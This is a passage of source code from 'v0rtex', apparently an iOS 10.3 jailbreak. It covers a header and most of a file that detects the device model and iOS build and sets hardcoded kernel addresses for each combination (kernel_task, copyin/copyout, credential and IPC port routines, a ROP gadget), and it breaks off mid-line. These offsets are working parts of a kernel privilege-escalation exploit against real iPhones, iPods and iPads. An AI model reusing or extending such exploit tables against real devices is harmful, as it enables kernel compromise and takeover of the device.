extern uint64_t OFFSET_COPYOUT;
extern uint64_t OFFSET_CHGPROCCNT;
extern uint64_t OFFSET_KAUTH_CRED_REF;
extern uint64_t OFFSET_IPC_PORT_ALLOC_SPECIAL;
extern uint64_t OFFSET_IPC_KOBJECT_SET;
extern uint64_t OFFSET_IPC_PORT_MAKE_SEND;
extern uint64_t OFFSET_OSSERIALIZER_SERIALIZE;
extern uint64_t OFFSET_ROP_LDR_X0_X0_0x10;
extern uint64_t OFFSET_ROOT_MOUNT_V_NODE;

// Populates the OFFSET_* globals for the running device/build.
// Returns a BOOL; what it means for an unrecognised device is defined in
// symbols.m (not fully visible here) — check before relying on it.
BOOL init_symbols(void);
--------------------------------------------------------------------------------
/v0rtex-S/symbols.m:
--------------------------------------------------------------------------------
//
//  symbols.m
//  v0rtex
//
//  Created by Ben on 16/12/2017.
//  Copyright © 2017 Sticktron. All rights reserved.
7 | // 8 | 9 | #include 10 | #include "symbols.h" 11 | #include "common.h" 12 | 13 | uint64_t OFFSET_ZONE_MAP; 14 | uint64_t OFFSET_KERNEL_MAP; 15 | uint64_t OFFSET_KERNEL_TASK; 16 | uint64_t OFFSET_REALHOST; 17 | uint64_t OFFSET_COPYIN; 18 | uint64_t OFFSET_COPYOUT; 19 | uint64_t OFFSET_CHGPROCCNT; 20 | uint64_t OFFSET_KAUTH_CRED_REF; 21 | uint64_t OFFSET_IPC_PORT_ALLOC_SPECIAL; 22 | uint64_t OFFSET_IPC_KOBJECT_SET; 23 | uint64_t OFFSET_IPC_PORT_MAKE_SEND; 24 | uint64_t OFFSET_OSSERIALIZER_SERIALIZE; 25 | uint64_t OFFSET_ROP_LDR_X0_X0_0x10; 26 | uint64_t OFFSET_ROOT_MOUNT_V_NODE; 27 | 28 | BOOL init_symbols() 29 | { 30 | NSString *ver = [[NSProcessInfo processInfo] operatingSystemVersionString]; 31 | 32 | struct utsname u; 33 | uname(&u); 34 | 35 | LOG("sysname: %s", u.sysname); 36 | LOG("nodename: %s", u.nodename); 37 | LOG("release: %s", u.release); 38 | LOG("version: %s", u.version); 39 | LOG("machine: %s", u.machine); 40 | 41 | 42 | //5S 43 | if (strcmp(u.machine, "iPhone6,1") == 0 || strcmp(u.machine, "iPhone6,2") == 0) 44 | { 45 | if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 46 | { 47 | OFFSET_ZONE_MAP =0xfffffff00754c478; 48 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 49 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 50 | OFFSET_REALHOST =0xfffffff00752eba0; 51 | OFFSET_COPYIN =0xfffffff007181218; 52 | OFFSET_COPYOUT =0xfffffff00718140c; 53 | OFFSET_CHGPROCCNT =0xfffffff00738e504; 54 | OFFSET_KAUTH_CRED_REF =0xfffffff0073688a4; 55 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f7c; 56 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1d4; 57 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099aa0; 58 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441424; 59 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006474a84; 60 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 61 | } 62 | else if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 63 | { 64 | OFFSET_ZONE_MAP =0xfffffff00754c478; 65 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 66 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 67 | 
OFFSET_REALHOST =0xfffffff00752eba0; 68 | OFFSET_COPYIN =0xfffffff007180e98; 69 | OFFSET_COPYOUT =0xfffffff00718108c; 70 | OFFSET_CHGPROCCNT =0xfffffff00738e77c; 71 | OFFSET_KAUTH_CRED_REF =0xfffffff007368b08; 72 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f14; 73 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1ec; 74 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a38; 75 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441908; 76 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006470a84; 77 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 78 | } 79 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 80 | { 81 | OFFSET_ZONE_MAP =0xfffffff00754c478; 82 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 83 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 84 | OFFSET_REALHOST =0xfffffff00752eba0; 85 | OFFSET_COPYIN =0xfffffff0071811ec; 86 | OFFSET_COPYOUT =0xfffffff0071813e0; 87 | OFFSET_CHGPROCCNT =0xfffffff00738e82c; 88 | OFFSET_KAUTH_CRED_REF =0xfffffff007368be4; 89 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f14; 90 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1ec; 91 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a38; 92 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff0074419b8; 93 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006474a84; 94 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 95 | } 96 | else if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 97 | { 98 | OFFSET_ZONE_MAP =0xfffffff00754c478; 99 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 100 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 101 | OFFSET_REALHOST =0xfffffff00752eba0; 102 | OFFSET_COPYIN =0xfffffff007181218; 103 | OFFSET_COPYOUT =0xfffffff00718140c; 104 | OFFSET_CHGPROCCNT =0xfffffff00738e504; 105 | OFFSET_KAUTH_CRED_REF =0xfffffff0073688a4; 106 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f7c; 107 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1d4; 108 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099aa0; 109 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441424; 110 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006474a84; 111 | OFFSET_ROOT_MOUNT_V_NODE 
=0xfffffff0075a80b0; 112 | } 113 | } 114 | 115 | //6 116 | else if (strcmp(u.machine, "iPhone7,1") == 0 || strcmp(u.machine, "iPhone7,2") == 0) 117 | { 118 | if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 119 | { 120 | 121 | OFFSET_ZONE_MAP =0xfffffff007558478; 122 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 123 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 124 | OFFSET_REALHOST =0xfffffff00753aba0; 125 | OFFSET_COPYIN =0xfffffff00718d3a8; 126 | OFFSET_COPYOUT =0xfffffff00718d59c; 127 | OFFSET_CHGPROCCNT =0xfffffff00739a78c; 128 | OFFSET_KAUTH_CRED_REF =0xfffffff007374b2c; 129 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 130 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 131 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 132 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d6ac; 133 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006404a84; 134 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 135 | 136 | } 137 | else if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 138 | { 139 | 140 | OFFSET_ZONE_MAP =0xfffffff007558478; 141 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 142 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 143 | OFFSET_REALHOST =0xfffffff00753aba0; 144 | OFFSET_COPYIN =0xfffffff00718d3a8; 145 | OFFSET_COPYOUT =0xfffffff00718d59c; 146 | OFFSET_CHGPROCCNT =0xfffffff00739a78c; 147 | OFFSET_KAUTH_CRED_REF =0xfffffff007374b2c; 148 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 149 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 150 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 151 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d6ac; 152 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006404a84; 153 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 154 | 155 | } 156 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 157 | { 158 | OFFSET_ZONE_MAP =0xfffffff007558478; 159 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 160 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 161 | OFFSET_REALHOST =0xfffffff00753aba0; 162 | OFFSET_COPYIN =0xfffffff00718d37c; 163 | OFFSET_COPYOUT 
=0xfffffff00718d570; 164 | OFFSET_CHGPROCCNT =0xfffffff00739aab4; 165 | OFFSET_KAUTH_CRED_REF =0xfffffff007374e6c; 166 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 167 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 168 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 169 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744dc40; 170 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006400a84; 171 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 172 | } 173 | else if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 174 | { 175 | OFFSET_ZONE_MAP =0xfffffff007558478; 176 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 177 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 178 | OFFSET_REALHOST =0xfffffff00753aba0; 179 | OFFSET_COPYIN =0xfffffff00718d028; 180 | OFFSET_COPYOUT =0xfffffff00718d21c; 181 | OFFSET_CHGPROCCNT =0xfffffff00739aa04; 182 | OFFSET_KAUTH_CRED_REF =0xfffffff007374d90; 183 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 184 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 185 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 186 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744db90; 187 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006400a84; 188 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 189 | 190 | } 191 | } 192 | 193 | 194 | //6S 10.3.3 195 | else if (strcmp(u.machine, "iPhone8,1") == 0 || strcmp(u.machine, "iPhone8,2") == 0) 196 | { 197 | if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 198 | { 199 | OFFSET_ZONE_MAP =0xfffffff007548478; 200 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 201 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 202 | OFFSET_REALHOST =0xfffffff00752aba0; 203 | OFFSET_COPYIN =0xfffffff0071803a0; 204 | OFFSET_COPYOUT =0xfffffff007180594; 205 | OFFSET_CHGPROCCNT =0xfffffff00738d894; 206 | OFFSET_KAUTH_CRED_REF =0xfffffff007367c18; 207 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099e94; 208 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad16c; 209 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070999b8; 210 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007440a20; 211 | 
OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063b0a84; 212 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 213 | 214 | } 215 | else if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 216 | { 217 | OFFSET_ZONE_MAP =0xfffffff007548478; 218 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 219 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 220 | OFFSET_REALHOST =0xfffffff00752aba0; 221 | OFFSET_COPYIN =0xfffffff007180720; 222 | OFFSET_COPYOUT =0xfffffff007180914; 223 | OFFSET_CHGPROCCNT =0xfffffff00738d61c; 224 | OFFSET_KAUTH_CRED_REF =0xfffffff0073679b4; 225 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099efc; 226 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad154; 227 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a20; 228 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744053c; 229 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063b4a84; 230 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 231 | } 232 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 233 | { 234 | 235 | OFFSET_ZONE_MAP =0xfffffff007548478; 236 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 237 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 238 | OFFSET_REALHOST =0xfffffff00752aba0; 239 | OFFSET_COPYIN =0xfffffff0071806f4; 240 | OFFSET_COPYOUT =0xfffffff0071808e8; 241 | OFFSET_CHGPROCCNT =0xfffffff00738d944; 242 | OFFSET_KAUTH_CRED_REF =0xfffffff007367cf4; 243 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099e94; 244 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad16c; 245 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070999b8; 246 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007440ad0; 247 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063b4a84; 248 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 249 | 250 | } 251 | else if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 252 | { 253 | OFFSET_ZONE_MAP =0xfffffff007548478; 254 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 255 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 256 | OFFSET_REALHOST =0xfffffff00752aba0; 257 | OFFSET_COPYIN =0xfffffff007180720; 258 | OFFSET_COPYOUT =0xfffffff007180914; 259 | OFFSET_CHGPROCCNT 
=0xfffffff00738d61c; 260 | OFFSET_KAUTH_CRED_REF =0xfffffff0073679b4; 261 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099efc; 262 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad154; 263 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a20; 264 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744053c; 265 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063b4a84; 266 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 267 | } 268 | 269 | } 270 | //SE 271 | else if (strcmp(u.machine, "iPhone8,4") == 0) 272 | { 273 | if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 274 | { 275 | OFFSET_ZONE_MAP =0xfffffff007548478; 276 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 277 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 278 | OFFSET_REALHOST =0xfffffff00752aba0; 279 | OFFSET_COPYIN =0xfffffff0071803a0; 280 | OFFSET_COPYOUT =0xfffffff007180594; 281 | OFFSET_CHGPROCCNT =0xfffffff00738d894; 282 | OFFSET_KAUTH_CRED_REF =0xfffffff007367c18; 283 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099e94; 284 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad16c; 285 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070999b8; 286 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007440a20; 287 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063d0a84; 288 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 289 | } 290 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 291 | { 292 | OFFSET_ZONE_MAP =0xfffffff007548478; 293 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 294 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 295 | OFFSET_REALHOST =0xfffffff00752aba0; 296 | OFFSET_COPYIN =0xfffffff0071806f4; 297 | OFFSET_COPYOUT =0xfffffff0071808e8; 298 | OFFSET_CHGPROCCNT =0xfffffff00738d944; 299 | OFFSET_KAUTH_CRED_REF =0xfffffff007367cf4; 300 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099e94; 301 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad16c; 302 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070999b8; 303 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007440ad0; 304 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063d0a84; 305 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 306 | } 307 | 
else if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 308 | { 309 | OFFSET_ZONE_MAP =0xfffffff007548478; 310 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 311 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 312 | OFFSET_REALHOST =0xfffffff00752aba0; 313 | OFFSET_COPYIN =0xfffffff007180720; 314 | OFFSET_COPYOUT =0xfffffff007180914; 315 | OFFSET_CHGPROCCNT =0xfffffff00738d61c; 316 | OFFSET_KAUTH_CRED_REF =0xfffffff0073679b4; 317 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099efc; 318 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad154; 319 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a20; 320 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744053c; 321 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063d0a84; 322 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 323 | 324 | } 325 | if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 326 | { 327 | OFFSET_ZONE_MAP =0xfffffff007548478; 328 | OFFSET_KERNEL_MAP =0xfffffff0075a4050; 329 | OFFSET_KERNEL_TASK =0xfffffff0075a4048; 330 | OFFSET_REALHOST =0xfffffff00752aba0; 331 | OFFSET_COPYIN =0xfffffff007180720; 332 | OFFSET_COPYOUT =0xfffffff007180914; 333 | OFFSET_CHGPROCCNT =0xfffffff00738d61c; 334 | OFFSET_KAUTH_CRED_REF =0xfffffff0073679b4; 335 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099efc; 336 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad154; 337 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a20; 338 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744053c; 339 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff0063d0a84; 340 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a40b0; 341 | } 342 | } 343 | 344 | //7 345 | else if (strcmp(u.machine, "iPhone9,1") == 0 || strcmp(u.machine, "iPhone9,2") == 0 || strcmp(u.machine, "iPhone9,3") == 0 || strcmp(u.machine, "iPhone9,4") == 0) 346 | { 347 | if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 348 | { 349 | OFFSET_ZONE_MAP =0xfffffff007590478; 350 | OFFSET_KERNEL_MAP =0xfffffff0075ec050; 351 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 352 | OFFSET_REALHOST =0xfffffff007572ba0; 353 | OFFSET_COPYIN =0xfffffff0071c5db4; 354 | 
OFFSET_COPYOUT =0xfffffff0071c6094; 355 | OFFSET_CHGPROCCNT =0xfffffff0073d38e4; 356 | OFFSET_KAUTH_CRED_REF =0xfffffff0073adc68; 357 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070deff4; 358 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22cc; 359 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb18; 360 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486a14; 361 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006310a84; 362 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 363 | } 364 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 365 | { 366 | 367 | OFFSET_ZONE_MAP =0xfffffff007590478; 368 | OFFSET_KERNEL_MAP =0xfffffff0075ec050; 369 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 370 | OFFSET_REALHOST =0xfffffff007572ba0; 371 | OFFSET_COPYIN =0xfffffff0071c6108; 372 | OFFSET_COPYOUT =0xfffffff0071c63e8; 373 | OFFSET_CHGPROCCNT =0xfffffff0073d3994; 374 | OFFSET_KAUTH_CRED_REF =0xfffffff0073add44; 375 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070deff4; 376 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22cc; 377 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb18; 378 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486ac4; 379 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006314a84; 380 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 381 | 382 | } 383 | else if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 384 | { 385 | 386 | OFFSET_ZONE_MAP =0xfffffff007590478; 387 | OFFSET_KERNEL_MAP =0xfffffff0075ec050; 388 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 389 | OFFSET_REALHOST =0xfffffff007572ba0; 390 | OFFSET_COPYIN =0xfffffff0071c6134; 391 | OFFSET_COPYOUT =0xfffffff0071c6414; 392 | OFFSET_CHGPROCCNT =0xfffffff0073d366c; 393 | OFFSET_KAUTH_CRED_REF =0xfffffff0073ada04; 394 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070df05c; 395 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22b4; 396 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb80; 397 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486530; 398 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006314a84; 399 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 400 | 401 | } 402 
| else if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 403 | { 404 | 405 | OFFSET_ZONE_MAP =0xfffffff007590478; 406 | OFFSET_KERNEL_MAP =0xfffffff0075ec050; 407 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 408 | OFFSET_REALHOST =0xfffffff007572ba0; 409 | OFFSET_COPYIN =0xfffffff0071c6134; 410 | OFFSET_COPYOUT =0xfffffff0071c6414; 411 | OFFSET_CHGPROCCNT =0xfffffff0073d366c; 412 | OFFSET_KAUTH_CRED_REF =0xfffffff0073ada04; 413 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070df05c; 414 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22b4; 415 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb80; 416 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486530; 417 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006314a84; 418 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 419 | 420 | } 421 | } 422 | //iPod 6 423 | else if (strcmp(u.machine, "iPod7,1") == 0) 424 | { 425 | if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 426 | { 427 | OFFSET_ZONE_MAP =0xfffffff007558478; 428 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 429 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 430 | OFFSET_REALHOST =0xfffffff00753aba0; 431 | OFFSET_COPYIN =0xfffffff00718d3a8; 432 | OFFSET_COPYOUT =0xfffffff00718d59c; 433 | OFFSET_CHGPROCCNT =0xfffffff00739a78c; 434 | OFFSET_KAUTH_CRED_REF =0xfffffff007374b2c; 435 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 436 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 437 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 438 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d6ac; 439 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00646ca84; 440 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 441 | 442 | } 443 | else if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 444 | { 445 | OFFSET_ZONE_MAP =0xfffffff007558478; 446 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 447 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 448 | OFFSET_REALHOST =0xfffffff00753aba0; 449 | OFFSET_COPYIN =0xfffffff00718d3a8; 450 | OFFSET_COPYOUT =0xfffffff00718d59c; 451 | OFFSET_CHGPROCCNT =0xfffffff00739a78c; 452 | 
OFFSET_KAUTH_CRED_REF =0xfffffff007374b2c; 453 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 454 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 455 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 456 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d6ac; 457 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00646ca84; 458 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 459 | 460 | } 461 | else if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 462 | { 463 | OFFSET_ZONE_MAP =0xfffffff007558478; 464 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 465 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 466 | OFFSET_REALHOST =0xfffffff00753aba0; 467 | OFFSET_COPYIN =0xfffffff00718d028; 468 | OFFSET_COPYOUT =0xfffffff00718d21c; 469 | OFFSET_CHGPROCCNT =0xfffffff00739aa04; 470 | OFFSET_KAUTH_CRED_REF =0xfffffff007374d90; 471 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 472 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 473 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 474 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744db90; 475 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006468a84; 476 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 477 | } 478 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 479 | { 480 | OFFSET_ZONE_MAP =0xfffffff007558478; 481 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 482 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 483 | OFFSET_REALHOST =0xfffffff00753aba0; 484 | OFFSET_COPYIN =0xfffffff00718d37c; 485 | OFFSET_COPYOUT =0xfffffff00718d570; 486 | OFFSET_CHGPROCCNT =0xfffffff00739aab4; 487 | OFFSET_KAUTH_CRED_REF =0xfffffff007374e6c; 488 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a60b4; 489 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b938c; 490 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5bd8; 491 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744dc40; 492 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff00646ca84; 493 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 494 | } 495 | } 496 | 497 | //iPad Pro 10.5" 498 | else if (strcmp(u.machine, "iPad7,3") == 0 || strcmp(u.machine, 
"iPad7,4") == 0) 499 | { 500 | if ([ver isEqual: @"Version 10.3.2 (Build 14F8089)"]) 501 | { 502 | OFFSET_ZONE_MAP =0xfffffff007590478; 503 | OFFSET_KERNEL_MAP =0xfffffff0075ec050; 504 | OFFSET_KERNEL_TASK =0xfffffff0075ec048; 505 | OFFSET_REALHOST =0xfffffff007572ba0; 506 | OFFSET_COPYIN =0xfffffff0071c6220; 507 | OFFSET_COPYOUT =0xfffffff0071c6500; 508 | OFFSET_CHGPROCCNT =0xfffffff0073d3bd8; 509 | OFFSET_KAUTH_CRED_REF =0xfffffff0073adf88; 510 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070df014; 511 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070f22ec; 512 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070deb38; 513 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007486d08; 514 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006244a84; 515 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075ec0b0; 516 | } 517 | else if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) { 518 | OFFSET_ZONE_MAP =0xfffffff007590478; 519 | OFFSET_KERNEL_MAP 